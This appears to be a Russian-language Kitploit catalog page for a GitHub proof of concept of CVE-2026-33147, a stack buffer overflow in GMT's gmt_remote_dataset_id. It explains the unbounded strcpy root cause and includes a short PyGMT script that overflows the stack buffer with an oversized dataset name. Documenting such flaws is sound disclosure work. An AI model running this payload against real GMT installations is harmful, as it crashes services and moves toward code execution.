Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-33147 — Эксплойт для проверки концепции переполнения буфера на основе стека в gmt_remote_dataset_id из GMT, демонстрирующий сбой и потенциальное выполнение кода через специально созданные имена наборов данных. | Kitploit
Инструменты/GitHubGitHub/redyank/cve-2026-33147
Анализ уязвимостейЭксплуатацияЭксплуатация Бинарных Файлов
GitHubredyank/cve-2026-33147

CVE-2026-33147

Эксплойт для проверки концепции переполнения буфера на основе стека в gmt_remote_dataset_id из GMT, демонстрирующий сбой и потенциальное выполнение кода через специально созданные имена наборов данных.

Репозиторий
14 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-33147

CVE-2026-33147 (переполнение буфера на основе стека в gmt_remote_dataset_id)

Краткое описание

Уязвимость переполнения буфера на основе стека была обнаружена в функции gmt_remote_dataset_id в файле src/gmt_remote.c. Проблема возникает при передаче специально сформированной длинной строки в качестве идентификатора набора данных (например, через модуль which), что приводит к сбою или потенциальному произвольному выполнению кода.

Подробности

Уязвимость вызвана небезопасным использованием strcpy (или аналогичных неограниченных строковых операций) при копировании управляемого пользователем имени набора данных в буфер фиксированного размера в стеке file[PATH_MAX].

  • Уязвимая функция: gmt_remote_dataset_id
  • Уязвимый файл: src/gmt_remote.c
  • Корневая причина: отсутствие проверки длины входных данных перед копированием в буфер стека.

Когда входные данные превышают PATH_MAX (обычно 4096 байт), происходит перезапись кадра стека, включая обратный адрес. Это было подтверждено с помощью AddressSanitizer (ASan), который сообщил о переполнении буфера стека (stack-buffer-overflow).

PoC

Следующий скрипт на Python с использованием PyGMT воспроизводит сбой:

root@kitploit:~
import struct
from pygmt.clib import Session

with Session() as lib:
    # Полезная нагрузка, предназначенная для переполнения буфера стека
    padding = "A" * 4096
    fake_ret = struct.pack("<Q", 0x4141414141414141) * 100
    payload = padding + fake_ret.decode("latin-1")
    
    # Запуск переполнения через модуль 'which'
    lib.call_module("which", [payload])

Воздействие

Это уязвимость, связанная с безопасностью памяти.

  • Кто затронут: любой пользователь или приложение, использующее GMT через C API или интерфейсы более высокого уровня, такие как PyGMT, которые обрабатывают недоверенные имена наборов данных.
  • Последствия: как минимум, вызывает отказ в обслуживании (DoS) из-за сбоя программы. В определенных средах это потенциально может быть использовано для произвольного выполнения кода.
Скачать инструмент